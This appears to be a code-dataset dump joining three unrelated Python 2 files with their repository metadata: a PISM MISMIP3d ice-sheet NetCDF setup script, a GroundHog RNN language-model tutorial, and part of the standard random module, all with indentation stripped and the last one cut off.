# load data from Stnd-experiment
try:
name = inpath # + '.nc'
infile = NC(name, 'r')
except Exception:
print "file '%s' not found" % name
sys.exit(2)
# exit(-1)
x = squeeze(infile.variables["x"][:])
nx = len(x)
boxWidth = x[nx - 1] / ((nx - 1) / 2) / 1e3
# grid size: # of boxes
ny = int(np.floor(yExtent / boxWidth / 2) * 2 + 1) # make it an odd number
# grid size: extent in km's, origin (0,0) in the center of the domain
y = np.linspace(-yExtent / 2, yExtent / 2, ny) * 1000.0
nxcenter = int(np.floor(0.5 * nx))
nycenter = int(np.floor(0.5 * ny))
thk = np.zeros((ny, nx))
topg = np.zeros((ny, nx))
ice_surface_temp = np.zeros((ny, nx))
precip = np.zeros((ny, nx))
tauc = np.zeros((ny, nx))
print "Informations from createSetup_PXXS.py:"
print "grid size:"
print nx
print ny
print "grid size center:"
print nxcenter
print nycenter
print "domain range in meters:"
print "x-dir:"
print x[0]
print x[nx - 1]
print "y-dir:"
print y[0]
print y[ny - 1]
print "y-boxWidth:"
print y[ny - 1] - y[ny - 2]
# load data from Stnd-result:
Thk_stnd = squeeze(infile.variables["thk"][:])
precip_stnd = squeeze(infile.variables["climatic_mass_balance"][:])
Topg_stnd = squeeze(infile.variables["topg"][:])
if subgl == True:
Gl_mask = squeeze(infile.variables["gl_mask"][:])
print "number snapshots:"
print len(Thk_stnd[:, 0, 0])
lastslice = len(Thk_stnd[:, 0, 0]) - 1
thk_stnd = Thk_stnd[lastslice, :, :]
precip_stnd = precip_stnd[lastslice, :, :]
topg_stnd = Topg_stnd[lastslice, :, :]
if subgl == True:
gl_mask = Gl_mask[lastslice, :, :]
# load bedrock geometry topg from Stnd-experiment:
for i in range(0, nx):
for j in range(0, ny):
topg[j, i] = topg_stnd[0, i]
# load initial ice-thickness:
for i in range(0, nx):
for j in range(0, ny):
thk[j, i] = thk_stnd[0, i]
# load precipitation field:
for i in range(0, nx):
for j in range(0, ny):
precip[j, i] = precip_stnd[0, 0] / secpera / ice_density
print "snow per year in meters"
print precip_stnd[0, 0]
# defining dummy temperature:
for i in range(0, nx):
for j in range(0, ny):
ice_surface_temp[j, i] = 268.15
# number of grid cells
Mx = x.shape[0]
middle = (Mx - 1) / 2
x1 = x[middle:Mx] / 1000.0 # km
dx = x1[1] - x1[0]
thk_stnd1 = thk_stnd[1, middle:Mx] # 1D
Mask = squeeze(infile.variables["mask"][:])
mask = Mask[lastslice, :, :]
mask = mask[1, middle:Mx] # 1D
# find grounding line
for i in range(mask.shape[0]):
if (thk_stnd1[i] > 0 and mask[i] == 2 and mask[i + 1] == 3):
xg = x1[i]
if subgl == True:
xg_new = xg + dx / 2.0 - (1 - gl_mask[0, i]) * dx + gl_mask[0, i + 1] * dx
else:
xg_new = xg + dx / 2.0
print "old grounding line at position:"
print xg, "km"
print "new grounding line at position:"
print xg_new, "km"
xg = xg_new * 1.0e3
# defining tauc:
xb = xg
yb = 0
xc = 150e3
yc = 10e3
C = 1.0e7
a = float(a)
for i in range(nxcenter, nx):
for j in range(0, ny):
tauc[j, i] = C * (1 - a * math.exp(-(x[i] - xb) ** 2 / (2 * xc ** 2) - (y[j] - yb) ** 2 / (2 * yc ** 2)))
for i in range(0, nxcenter):
for j in range(0, ny):
tauc[j, i] = C * (1 - a * math.exp(-(x[i] + xb) ** 2 / (2 * xc ** 2) - (y[j] - yb) ** 2 / (2 * yc ** 2)))
##### define dimensions in NetCDF file #####
ncfile = NC(WRIT_FILE, 'w', format='NETCDF3_CLASSIC')
xdim = ncfile.createDimension('x', nx)
ydim = ncfile.createDimension('y', ny)
##### define variables, set attributes, write data #####
# format: ['units', 'long_name', 'standard_name', '_FillValue', array]
vars = {'y': ['m',
'y-coordinate in Cartesian system',
'projection_y_coordinate',
None,
y],
'x': ['m',
'x-coordinate in Cartesian system',
'projection_x_coordinate',
None,
x],
'thk': ['m',
'floating ice shelf thickness',
'land_ice_thickness',
1.0,
thk],
'topg': ['m',
'bedrock surface elevation',
'bedrock_altitude',
-600.0,
topg],
'ice_surface_temp': ['K',
'annual mean air temperature at ice surface',
'surface_temperature',
248.0,
ice_surface_temp],
'climatic_mass_balance': ['kg m-2 year-1',
'mean annual net ice equivalent accumulation rate',
'land_ice_surface_specific_mass_balance_flux',
0.2 * ice_density,
precip],
'tauc': ['Pa',
'yield stress for basal till (plastic or pseudo-plastic model)',
'yield_stress_for_basal_till',
1e6,
tauc],
}
for name in vars.keys():
[_, _, _, fill_value, data] = vars[name]
if name in ['x', 'y']:
var = ncfile.createVariable(name, 'f4', (name,))
else:
var = ncfile.createVariable(name, 'f4', ('y', 'x'), fill_value=fill_value)
for each in zip(['units', 'long_name', 'standard_name'], vars[name]):
if each[1]:
setattr(var, each[0], each[1])
var[:] = data
# finish up
ncfile.close()
print "NetCDF file ", WRIT_FILE, " created"
print ''
|
talbrecht/pism_pik07
|
examples/mismip/mismip3d/setup_PXXS.py
|
Python
|
gpl-3.0
| 6,670
|
[
"NetCDF"
] |
7c0dff9c100642e35b69bc00c94a099a41d64460527ffba48d41ed15932c685b
|
"""
Test of the classical LM model for language modelling
"""
from groundhog.datasets import LMIterator
from groundhog.trainer.SGD_adadelta import SGD
from groundhog.mainLoop import MainLoop
from groundhog.layers import MultiLayer, \
RecurrentMultiLayer, \
RecurrentMultiLayerInp, \
RecurrentMultiLayerShortPath, \
RecurrentMultiLayerShortPathInp, \
RecurrentMultiLayerShortPathInpAll, \
SoftmaxLayer, \
LastState,\
UnaryOp, \
Operator, \
Shift, \
GaussianNoise, \
SigmoidLayer
from groundhog.layers import maxpool, \
maxpool_ntimes, \
last, \
last_ntimes,\
tanh, \
sigmoid, \
rectifier,\
hard_sigmoid, \
hard_tanh
from groundhog.models import LM_Model
from theano.sandbox.scan import scan
import numpy
import theano
import theano.tensor as TT
linear = lambda x:x
theano.config.allow_gc = False
def get_text_data(state):
def out_format (x, y, r):
return {'x':x, 'y' :y, 'reset': r}
def out_format_valid (x, y, r):
return {'x':x, 'y' :y, 'reset': r}
train_data = LMIterator(
batch_size=state['bs'],
path = state['path'],
stop=-1,
seq_len = state['seqlen'],
mode="train",
chunks=state['chunks'],
shift = state['shift'],
output_format = out_format,
can_fit=True)
valid_data = LMIterator(
batch_size=state['bs'],
path=state['path'],
stop=-1,
use_infinite_loop=False,
allow_short_sequences = True,
seq_len= state['seqlen'],
mode="valid",
reset =state['reset'],
chunks=state['chunks'],
shift = state['shift'],
output_format = out_format_valid,
can_fit=True)
test_data = LMIterator(
batch_size=state['bs'],
path = state['path'],
stop=-1,
use_infinite_loop=False,
allow_short_sequences=True,
seq_len= state['seqlen'],
mode="test",
chunks=state['chunks'],
shift = state['shift'],
output_format = out_format_valid,
can_fit=True)
if 'wiki' in state['path']:
test_data = None
return train_data, valid_data, test_data
def jobman(state, channel):
# load dataset
rng = numpy.random.RandomState(state['seed'])
# declare the dimensionalies of the input and output
if state['chunks'] == 'words':
state['n_in'] = 10000
state['n_out'] = 10000
else:
state['n_in'] = 50
state['n_out'] = 50
train_data, valid_data, test_data = get_text_data(state)
## BEGIN Tutorial
### Define Theano Input Variables
x = TT.lvector('x')
y = TT.lvector('y')
h0 = theano.shared(numpy.zeros((eval(state['nhids'])[-1],), dtype='float32'))
### Neural Implementation of the Operators: \oplus
#### Word Embedding
emb_words = MultiLayer(
rng,
n_in=state['n_in'],
n_hids=eval(state['inp_nhids']),
activation=eval(state['inp_activ']),
init_fn='sample_weights_classic',
weight_noise=state['weight_noise'],
rank_n_approx = state['rank_n_approx'],
scale=state['inp_scale'],
sparsity=state['inp_sparse'],
learn_bias = True,
bias_scale=eval(state['inp_bias']),
name='emb_words')
#### Deep Transition Recurrent Layer
rec = eval(state['rec_layer'])(
rng,
eval(state['nhids']),
activation = eval(state['rec_activ']),
#activation = 'TT.nnet.sigmoid',
bias_scale = eval(state['rec_bias']),
scale=eval(state['rec_scale']),
sparsity=eval(state['rec_sparse']),
init_fn=eval(state['rec_init']),
weight_noise=state['weight_noise'],
name='rec')
#### Stiching them together
##### (1) Get the embedding of a word
x_emb = emb_words(x, no_noise_bias=state['no_noise_bias'])
##### (2) Embedding + Hidden State via DT Recurrent Layer
reset = TT.scalar('reset')
rec_layer = rec(x_emb, n_steps=x.shape[0],
init_state=h0*reset,
no_noise_bias=state['no_noise_bias'],
truncate_gradient=state['truncate_gradient'],
batch_size=1)
### Neural Implementation of the Operators: \lhd
#### Softmax Layer
output_layer = SoftmaxLayer(
rng,
eval(state['nhids'])[-1],
state['n_out'],
scale=state['out_scale'],
bias_scale=state['out_bias_scale'],
init_fn="sample_weights_classic",
weight_noise=state['weight_noise'],
sparsity=state['out_sparse'],
sum_over_time=True,
name='out')
### Few Optional Things
#### Direct shortcut from x to y
if state['shortcut_inpout']:
shortcut = MultiLayer(
rng,
n_in=state['n_in'],
n_hids=eval(state['inpout_nhids']),
activations=eval(state['inpout_activ']),
init_fn='sample_weights_classic',
weight_noise = state['weight_noise'],
scale=eval(state['inpout_scale']),
sparsity=eval(state['inpout_sparse']),
learn_bias=eval(state['inpout_learn_bias']),
bias_scale=eval(state['inpout_bias']),
name='shortcut')
#### Learning rate scheduling (1/(1+n/beta))
state['clr'] = state['lr']
def update_lr(obj, cost):
stp = obj.step
if isinstance(obj.state['lr_start'], int) and stp > obj.state['lr_start']:
time = float(stp - obj.state['lr_start'])
new_lr = obj.state['clr']/(1+time/obj.state['lr_beta'])
obj.lr = new_lr
if state['lr_adapt']:
rec.add_schedule(update_lr)
### Neural Implementations of the Language Model
#### Training
if state['shortcut_inpout']:
train_model = output_layer(rec_layer,
no_noise_bias=state['no_noise_bias'],
additional_inputs=[shortcut(x)]).train(target=y,
scale=numpy.float32(1./state['seqlen']))
else:
train_model = output_layer(rec_layer,
no_noise_bias=state['no_noise_bias']).train(target=y,
scale=numpy.float32(1./state['seqlen']))
nw_h0 = rec_layer.out[rec_layer.out.shape[0]-1]
if state['carry_h0']:
train_model.updates += [(h0, nw_h0)]
#### Validation
h0val = theano.shared(numpy.zeros((eval(state['nhids'])[-1],), dtype='float32'))
rec_layer = rec(emb_words(x, use_noise=False),
n_steps = x.shape[0],
batch_size=1,
init_state=h0val*reset,
use_noise=False)
nw_h0 = rec_layer.out[rec_layer.out.shape[0]-1]
if not state['shortcut_inpout']:
valid_model = output_layer(rec_layer,
use_noise=False).validate(target=y, sum_over_time=True)
else:
valid_model = output_layer(rec_layer,
additional_inputs=[shortcut(x, use_noise=False)],
use_noise=False).validate(target=y, sum_over_time=True)
valid_updates = []
if state['carry_h0']:
valid_updates = [(h0val, nw_h0)]
valid_fn = theano.function([x,y, reset], valid_model.cost,
name='valid_fn', updates=valid_updates)
#### Sampling
##### single-step sampling
def sample_fn(word_tm1, h_tm1):
x_emb = emb_words(word_tm1, use_noise = False, one_step=True)
h0_ = rec(x_emb, state_before=h_tm1, one_step=True, use_noise=False)[-1]
word = output_layer.get_sample(state_below=h0_, temp=1.)
return word, h0_
##### scan for iterating the single-step sampling multiple times
[samples, summaries], updates = scan(sample_fn,
states = [
TT.alloc(numpy.int64(0), state['sample_steps']),
TT.alloc(numpy.float32(0), 1, eval(state['nhids'])[-1])],
n_steps= state['sample_steps'],
name='sampler_scan')
##### define a Theano function
sample_fn = theano.function([], [samples],
updates=updates, profile=False, name='sample_fn')
##### Load a dictionary
dictionary = numpy.load(state['dictionary'])
if state['chunks'] == 'chars':
dictionary = dictionary['unique_chars']
else:
dictionary = dictionary['unique_words']
def hook_fn():
sample = sample_fn()[0]
print 'Sample:',
if state['chunks'] == 'chars':
print "".join(dictionary[sample])
else:
for si in sample:
print dictionary[si],
print
### Build and Train a Model
#### Define a model
model = LM_Model(
cost_layer = train_model,
weight_noise_amount=state['weight_noise_amount'],
valid_fn = valid_fn,
clean_before_noise_fn = False,
noise_fn = None,
rng = rng)
if state['reload']:
model.load(state['prefix']+'model.npz')
#### Define a trainer
##### Training algorithm (SGD)
algo = SGD(model, state, train_data)
##### Main loop of the trainer
main = MainLoop(train_data,
valid_data,
test_data,
model,
algo,
state,
channel,
train_cost = False,
hooks = hook_fn,
validate_postprocess = eval(state['validate_postprocess']))
main.main()
## END Tutorial
if __name__=='__main__':
state = {}
# complete path to data (cluster specific)
state['seqlen'] = 100
state['path']= "/data/lisa/data/PennTreebankCorpus/pentree_char_and_word.npz"
state['dictionary']= "/data/lisa/data/PennTreebankCorpus/dictionaries.npz"
state['chunks'] = 'chars'
state['seed'] = 123
# flag .. don't need to change it. It says what to do if you get cost to
# be nan .. you could raise, though I would leave it to this
state['on_nan'] = 'warn'
# DATA
# For wikipedia validation set is extremely large. Is very time
# wasteful. This value is only used for validation set, and IMHO should
# be something like seqlen * 10000 (i.e. the validation should be only
# 10000 steps
state['reset'] = -1
# For music/ word level I think 50 is a good idea. For character this
# should be at least 100 (I think there are problems with getting state
# of the art otherwise). Note most people use 200 !
# The job stops when learning rate declines to this value. It can be
# useful, because sometimes is hopeless to wait for validation error to
# get below minerr, or for the time to expire
state['minlr'] = float(5e-7)
# Layers
# Input
# Input weights are sampled from a gaussian with std=scale; this is the
# standard way to initialize
state['rank_n_approx'] = 0
state['inp_nhids'] = '[400]'
state['inp_activ'] = '[linear]'
state['inp_bias'] = '[0.]'
state['inp_sparse']= -1 # dense
state['inp_scale'] = .1
# This is for the output weights
state['out_scale'] = .1
state['out_bias_scale'] = -.5
state['out_sparse'] = -1
# HidLayer
# Hidden units on for the internal layers of DT-RNN. Having a single
# value results in a standard RNN
state['nhids'] = '[200, 200]'
# Activation of each layer
state['rec_activ'] = '"TT.nnet.sigmoid"'
state['rec_bias'] = '.0'
state['rec_sparse'] ='20'
state['rec_scale'] = '1.'
# sample_weights - you rescale the weights such that the largest
# singular value is scale
# sample_weights_classic : just sample weights from a gaussian with std
# equal to scale
state['rec_init'] = "'sample_weights'"
state['rec_layer'] = 'RecurrentMultiLayerShortPathInpAll'
# SGD params
state['bs'] = 1 # the size of the minibatch
state['lr'] = 1. # initial learn_ing rate
state['cutoff'] = 1. # threshold for gradient rescaling
state['moment'] = 0.995 #-.1 # momentum
# Do not optimize these
state['weight_noise'] = True # white Gaussian noise in weights
state['weight_noise_amount'] = 0.075 # standard deviation
# maximal number of updates
state['loopIters'] = int(1e8)
# maximal number of minutes to wait until killing job
state['timeStop'] = 48*60 # 48 hours
# Construct linear connections from input to output. These are factored
# (like the rank_n) to deal with the possible high dimensionality of the
# input, but it is a linear projection that feeds into the softmax
state['shortcut_inpout'] = False
state['shortcut_rank'] = 200
# Main Loop
# Make this to be a decently large value. Otherwise you waste a lot of
# memory keeping track of the training error (and other things) at each
# step + the stdout becomes extremely large
state['trainFreq'] = 100
state['hookFreq'] = 5000
state['validFreq'] = 1000
state['saveFreq'] = 15 # save every 15 minutes
state['prefix'] = 'model_' # prefix of the save files
state['reload'] = False # reload
state['overwrite'] = 1
# Threhold should be 1.004 for PPL, for entropy (which is what
# everything returns, it should be much smaller. Running value is 1.0002
# We should not hyperoptimize this
state['divide_lr'] = 2.
state['cost_threshold'] = 1.0002
state['patience'] = 1
state['validate_postprocess'] = 'lambda x:10**(x/numpy.log(10))'
state['truncate_gradient'] = 80 # truncated BPTT
state['lr_adapt'] = 0 # 1/(1 + n/n0) scheduling
state['lr_beta'] = 10*1900.
state['lr_start'] = 'on_error'
state['no_noise_bias'] = True # do not use weight noise for biases
state['carry_h0'] = True # carry over h0 across updates
state['sample_steps'] = 80
# Do not change these
state['minerr'] = -1
state['shift'] = 1 # n-step forward prediction
state['cutoff_rescale_length'] = False
jobman(state, None)
|
vseledkin/LV_groundhog
|
tutorials/DT_RNN_Tut_Adadelta.py
|
Python
|
bsd-3-clause
| 14,259
|
[
"Gaussian"
] |
24d2e79ffc663feff87efe329a6d8fd5051e49a3415bf1aa0a74930397b8b170
|
"""Random variable generators.
integers
--------
uniform within range
sequences
---------
pick random element
pick random sample
generate random permutation
distributions on the real line:
------------------------------
uniform
triangular
normal (Gaussian)
lognormal
negative exponential
gamma
beta
pareto
Weibull
distributions on the circle (angles 0 to 2pi)
---------------------------------------------
circular uniform
von Mises
General notes on the underlying Mersenne Twister core generator:
* The period is 2**19937-1.
* It is one of the most extensively tested generators in existence.
* Without a direct way to compute N steps forward, the semantics of
jumpahead(n) are weakened to simply jump to another distant state and rely
on the large period to avoid overlapping sequences.
* The random() method is implemented in C, executes in a single Python step,
and is, therefore, threadsafe.
"""
from __future__ import division
from warnings import warn as _warn
from types import MethodType as _MethodType, BuiltinMethodType as _BuiltinMethodType
from math import log as _log, exp as _exp, pi as _pi, e as _e, ceil as _ceil
from math import sqrt as _sqrt, acos as _acos, cos as _cos, sin as _sin
from os import urandom as _urandom
from binascii import hexlify as _hexlify
import hashlib as _hashlib
__all__ = ["Random","seed","random","uniform","randint","choice","sample",
"randrange","shuffle","normalvariate","lognormvariate",
"expovariate","vonmisesvariate","gammavariate","triangular",
"gauss","betavariate","paretovariate","weibullvariate",
"getstate","setstate","jumpahead", "WichmannHill", "getrandbits",
"SystemRandom"]
NV_MAGICCONST = 4 * _exp(-0.5)/_sqrt(2.0)
TWOPI = 2.0*_pi
LOG4 = _log(4.0)
SG_MAGICCONST = 1.0 + _log(4.5)
BPF = 53 # Number of bits in a float
RECIP_BPF = 2**-BPF
# Translated by Guido van Rossum from C source provided by
# Adrian Baddeley. Adapted by Raymond Hettinger for use with
# the Mersenne Twister and os.urandom() core generators.
import _random
class Random(_random.Random):
"""Random number generator base class used by bound module functions.
Used to instantiate instances of Random to get generators that don't
share state. Especially useful for multi-threaded programs, creating
a different instance of Random for each thread, and using the jumpahead()
method to ensure that the generated sequences seen by each thread don't
overlap.
Class Random can also be subclassed if you want to use a different basic
generator of your own devising: in that case, override the following
methods: random(), seed(), getstate(), setstate() and jumpahead().
Optionally, implement a getrandbits() method so that randrange() can cover
arbitrarily large ranges.
"""
VERSION = 3 # used by getstate/setstate
def __init__(self, x=None):
"""Initialize an instance.
Optional argument x controls seeding, as for Random.seed().
"""
self.seed(x)
self.gauss_next = None
def seed(self, a=None):
"""Initialize internal state from hashable object.
None or no argument seeds from current time or from an operating
system specific randomness source if available.
If a is not None or an int or long, hash(a) is used instead.
"""
if a is None:
try:
a = long(_hexlify(_urandom(16)), 16)
except NotImplementedError:
import time
a = long(time.time() * 256) # use fractional seconds
super(Random, self).seed(a)
self.gauss_next = None
def getstate(self):
"""Return internal state; can be passed to setstate() later."""
return self.VERSION, super(Random, self).getstate(), self.gauss_next
def setstate(self, state):
"""Restore internal state from object returned by getstate()."""
version = state[0]
if version == 3:
version, internalstate, self.gauss_next = state
super(Random, self).setstate(internalstate)
elif version == 2:
version, internalstate, self.gauss_next = state
# In version 2, the state was saved as signed ints, which causes
# inconsistencies between 32/64-bit systems. The state is
# really unsigned 32-bit ints, so we convert negative ints from
# version 2 to positive longs for version 3.
try:
internalstate = tuple( long(x) % (2**32) for x in internalstate )
except ValueError, e:
raise TypeError, e
super(Random, self).setstate(internalstate)
else:
raise ValueError("state with version %s passed to "
"Random.setstate() of version %s" %
(version, self.VERSION))
def jumpahead(self, n):
"""Change the internal state to one that is likely far away
from the current state. This method will not be in Py3.x,
so it is better to simply reseed.
"""
# The super.jumpahead() method uses shuffling to change state,
# so it needs a large and "interesting" n to work with. Here,
# we use hashing to create a large n for the shuffle.
s = repr(n) + repr(self.getstate())
n = int(_hashlib.new('sha512', s).hexdigest(), 16)
super(Random, self).jumpahead(n)
## ---- Methods below this point do not need to be overridden when
## ---- subclassing for the purpose of using a different core generator.
## -------------------- pickle support -------------------
def __getstate__(self): # for pickle
return self.getstate()
def __setstate__(self, state): # for pickle
self.setstate(state)
def __reduce__(self):
return self.__class__, (), self.getstate()
## -------------------- integer methods -------------------
def randrange(self, start, stop=None, step=1, int=int, default=None,
maxwidth=1L<<BPF):
"""Choose a random item from range(start, stop[, step]).
This fixes the problem with randint() which includes the
endpoint; in Python this is usually not what you want.
Do not supply the 'int', 'default', and 'maxwidth' arguments.
"""
# This code is a bit messy to make it fast for the
# common case while still doing adequate error checking.
istart = int(start)
if istart != start:
raise ValueError, "non-integer arg 1 for randrange()"
if stop is default:
if istart > 0:
if istart >= maxwidth:
return self._randbelow(istart)
return int(self.random() * istart)
raise ValueError, "empty range for randrange()"
# stop argument supplied.
istop = int(stop)
if istop != stop:
raise ValueError, "non-integer stop for randrange()"
width = istop - istart
if step == 1 and width > 0:
# Note that
# int(istart + self.random()*width)
# instead would be incorrect. For example, consider istart
# = -2 and istop = 0. Then the guts would be in
# -2.0 to 0.0 exclusive on both ends (ignoring that random()
# might return 0.0), and because int() truncates toward 0, the
# final result would be -1 or 0 (instead of -2 or -1).
# istart + int(self.random()*width)
# would also be incorrect, for a subtler reason: the RHS
# can return a long, and then randrange() would also return
# a long, but we're supposed to return an int (for backward
# compatibility).
if width >= maxwidth:
return int(istart + self._randbelow(width))
return int(istart + int(self.random()*width))
if step == 1:
raise ValueError, "empty range for randrange() (%d,%d, %d)" % (istart, istop, width)
# Non-unit step argument supplied.
istep = int(step)
if istep != step:
raise ValueError, "non-integer step for randrange()"
if istep > 0:
n = (width + istep - 1) // istep
elif istep < 0:
n = (width + istep + 1) // istep
else:
raise ValueError, "zero step for randrange()"
if n <= 0:
raise ValueError, "empty range for randrange()"
if n >= maxwidth:
return istart + istep*self._randbelow(n)
return istart + istep*int(self.random() * n)
def randint(self, a, b):
"""Return random integer in range [a, b], including both end points.
"""
return self.randrange(a, b+1)
def _randbelow(self, n, _log=_log, int=int, _maxwidth=1L<<BPF,
_Method=_MethodType, _BuiltinMethod=_BuiltinMethodType):
"""Return a random int in the range [0,n)
Handles the case where n has more bits than returned
by a single call to the underlying generator.
"""
try:
getrandbits = self.getrandbits
except AttributeError:
pass
else:
# Only call self.getrandbits if the original random() builtin method
# has not been overridden or if a new getrandbits() was supplied.
# This assures that the two methods correspond.
if type(self.random) is _BuiltinMethod or type(getrandbits) is _Method:
k = int(1.00001 + _log(n-1, 2.0)) # 2**k > n-1 > 2**(k-2)
r = getrandbits(k)
while r >= n:
r = getrandbits(k)
return r
if n >= _maxwidth:
_warn("Underlying random() generator does not supply \n"
"enough bits to choose from a population range this large")
return int(self.random() * n)
## -------------------- sequence methods -------------------
def choice(self, seq):
"""Choose a random element from a non-empty sequence."""
return seq[int(self.random() * len(seq))] # raises IndexError if seq is empty
def shuffle(self, x, random=None, int=int):
"""x, random=random.random -> shuffle list x in place; return None.
Optional arg random is a 0-argument function returning a random
float in [0.0, 1.0); by default, the standard random.random.
"""
if random is None:
random = self.random
for i in reversed(xrange(1, len(x))):
# pick an element in x[:i+1] with which to exchange x[i]
j = int(random() * (i+1))
x[i], x[j] = x[j], x[i]
def sample(self, population, k):
"""Chooses k unique random elements from a population sequence.
Returns a new list containing elements from the population while
leaving the original population unchanged. The resulting list is
in selection order so that all sub-slices will also be valid random
samples. This allows raffle winners (the sample) to be partitioned
into grand prize and second place winners (the subslices).
Members of the population need not be hashable or unique. If the
population contains repeats, then each occurrence is a possible
selection in the sample.
To choose a sample in a range of integers, use xrange as an argument.
This is especially fast and space efficient for sampling from a
large population: sample(xrange(10000000), 60)
"""
# Sampling without replacement entails tracking either potential
# selections (the pool) in a list or previous selections in a set.
# When the number of selections is small compared to the
# population, then tracking selections is efficient, requiring
# only a small set and an occasional reselection. For
# a larger number of selections, the pool tracking method is
# preferred since the list takes less space than the
# set and it doesn't suffer from frequent reselections.
n = len(population)
if not 0 <= k <= n:
raise ValueError("sample larger than population")
random = self.random
_int = int
result = [None] * k
setsize = 21 # size of a small set minus size of an empty list
if k > 5:
setsize += 4 ** _ceil(_log(k * 3, 4)) # table size for big sets
if n <= setsize or hasattr(population, "keys"):
# An n-length list is smaller than a k-length set, or this is a
# mapping type so the other algorithm wouldn't work.
pool = list(population)
for i in xrange(k): # invariant: non-selected at [0,n-i)
j = _int(random() * (n-i))
result[i] = pool[j]
pool[j] = pool[n-i-1] # move non-selected item into vacancy
else:
try:
selected = set()
selected_add = selected.add
for i in xrange(k):
j = _int(random() * n)
while j in selected:
j = _int(random() * n)
selected_add(j)
result[i] = population[j]
except (TypeError, KeyError): # handle (at least) sets
if isinstance(population, list):
raise
return self.sample(tuple(population), k)
return result
## -------------------- real-valued distributions -------------------
## -------------------- uniform distribution -------------------
def uniform(self, a, b):
"Get a random number in the range [a, b) or [a, b] depending on rounding."
return a + (b-a) * self.random()
## -------------------- triangular --------------------
def triangular(self, low=0.0, high=1.0, mode=None):
"""Triangular distribution.
Continuous distribution bounded by given lower and upper limits,
and having a given mode value in-between.
http://en.wikipedia.org/wiki/Triangular_distribution
"""
u = self.random()
c = 0.5 if mode is None else (mode - low) / (high - low)
if u > c:
u = 1.0 - u
c = 1.0 - c
low, high = high, low
return low + (high - low) * (u * c) ** 0.5
## -------------------- normal distribution --------------------
def normalvariate(self, mu, sigma):
"""Normal distribution.
mu is the mean, and sigma is the standard deviation.
"""
# mu = mean, sigma = standard deviation
# Uses Kinderman and Monahan method. Reference: Kinderman,
# A.J. and Monahan, J.F., "Computer generation of random
# variables using the ratio of uniform deviates", ACM Trans
# Math Software, 3, (1977), pp257-260.
random = self.random
while 1:
u1 = random()
u2 = 1.0 - random()
z = NV_MAGICCONST*(u1-0.5)/u2
zz = z*z/4.0
if zz <= -_log(u2):
break
return mu + z*sigma
## -------------------- lognormal distribution --------------------
def lognormvariate(self, mu, sigma):
"""Log normal distribution.
If you take the natural logarithm of this distribution, you'll get a
normal distribution with mean mu and standard deviation sigma.
mu can have any value, and sigma must be greater than zero.
"""
return _exp(self.normalvariate(mu, sigma))
## -------------------- exponential distribution --------------------
def expovariate(self, lambd):
"""Exponential distribution.
lambd is 1.0 divided by the desired mean. It should be
nonzero. (The parameter would be called "lambda", but that is
a reserved word in Python.) Returned values range from 0 to
positive infinity if lambd is positive, and from negative
infinity to 0 if lambd is negative.
"""
# lambd: rate lambd = 1/mean
# ('lambda' is a Python reserved word)
# we use 1-random() instead of random() to preclude the
# possibility of taking the log of zero.
return -_log(1.0 - self.random())/lambd
## -------------------- von Mises distribution --------------------
def vonmisesvariate(self, mu, kappa):
"""Circular data distribution.
mu is the mean angle, expressed in radians between 0 and 2*pi, and
kappa is the concentration parameter, which must be greater than or
equal to zero. If kappa is equal to zero, this distribution reduces
to a uniform random angle over the range 0 to 2*pi.
"""
# mu: mean angle (in radians between 0 and 2*pi)
# kappa: concentration parameter kappa (>= 0)
# if kappa = 0 generate uniform random angle
# Based upon an algorithm published in: Fisher, N.I.,
# "Statistical Analysis of Circular Data", Cambridge
# University Press, 1993.
# Thanks to Magnus Kessler for a correction to the
# implementation of step 4.
random = self.random
if kappa <= 1e-6:
return TWOPI * random()
a = 1.0 + _sqrt(1.0 + 4.0 * kappa * kappa)
b = (a - _sqrt(2.0 * a))/(2.0 * kappa)
r = (1.0 + b * b)/(2.0 * b)
while 1:
u1 = random()
z = _cos(_pi * u1)
f = (1.0 + r * z)/(r + z)
c = kappa * (r - f)
u2 = random()
if u2 < c * (2.0 - c) or u2 <= c * _exp(1.0 - c):
break
u3 = random()
if u3 > 0.5:
theta = (mu % TWOPI) + _acos(f)
else:
theta = (mu % TWOPI) - _acos(f)
return theta
## -------------------- gamma distribution --------------------
def gammavariate(self, alpha, beta):
"""Gamma distribution. Not the gamma function!
Conditions on the parameters are alpha > 0 and beta > 0.
The probability distribution function is:
x ** (alpha - 1) * math.exp(-x / beta)
pdf(x) = --------------------------------------
math.gamma(alpha) * beta ** alpha
"""
# alpha > 0, beta > 0, mean is alpha*beta, variance is alpha*beta**2
# Warning: a few older sources define the gamma distribution in terms
# of alpha > -1.0
if alpha <= 0.0 or beta <= 0.0:
raise ValueError, 'gammavariate: alpha and beta must be > 0.0'
random = self.random
if alpha > 1.0:
# Uses R.C.H. Cheng, "The generation of Gamma
# variables with non-integral shape parameters",
# Applied Statistics, (1977), 26, No. 1, p71-74
ainv = _sqrt(2.0 * alpha - 1.0)
bbb = alpha - LOG4
ccc = alpha + ainv
while 1:
u1 = random()
if not 1e-7 < u1 < .9999999:
continue
u2 = 1.0 - random()
v = _log(u1/(1.0-u1))/ainv
x = alpha*_exp(v)
z = u1*u1*u2
r = bbb+ccc*v-x
if r + SG_MAGICCONST - 4.5*z >= 0.0 or r >= _log(z):
return x * beta
elif alpha == 1.0:
# expovariate(1)
u = random()
while u <= 1e-7:
u = random()
return -_log(u) * beta
else: # alpha is between 0 and 1 (exclusive)
# Uses ALGORITHM GS of Statistical Computing - Kennedy & Gentle
while 1:
u = random()
b = (_e + alpha)/_e
p = b*u
if p <= 1.0:
x = p ** (1.0/alpha)
else:
x = -_log((b-p)/alpha)
u1 = random()
if p > 1.0:
if u1 <= x ** (alpha - 1.0):
break
elif u1 <= _exp(-x):
break
return x * beta
## -------------------- Gauss (faster alternative) --------------------
def gauss(self, mu, sigma):
"""Gaussian distribution.
mu is the mean, and sigma is the standard deviation. This is
slightly faster than the normalvariate() function.
Not thread-safe without a lock around calls.
"""
# When x and y are two variables from [0, 1), uniformly
# distributed, then
#
# cos(2*pi*x)*sqrt(-2*log(1-y))
# sin(2*pi*x)*sqrt(-2*log(1-y))
#
# are two *independent* variables with normal distribution
# (mu = 0, sigma = 1).
# (Lambert Meertens)
# (corrected version; bug discovered by Mike Miller, fixed by LM)
# Multithreading note: When two threads call this function
# simultaneously, it is possible that they will receive the
# same return value. The window is very small though. To
# avoid this, you have to use a lock around all calls. (I
# didn't want to slow this down in the serial case by using a
# lock here.)
random = self.random
z = self.gauss_next
self.gauss_next = None
if z is None:
x2pi = random() * TWOPI
g2rad = _sqrt(-2.0 * _log(1.0 - random()))
z = _cos(x2pi) * g2rad
self.gauss_next = _sin(x2pi) * g2rad
return mu + z*sigma
## -------------------- beta --------------------
## See
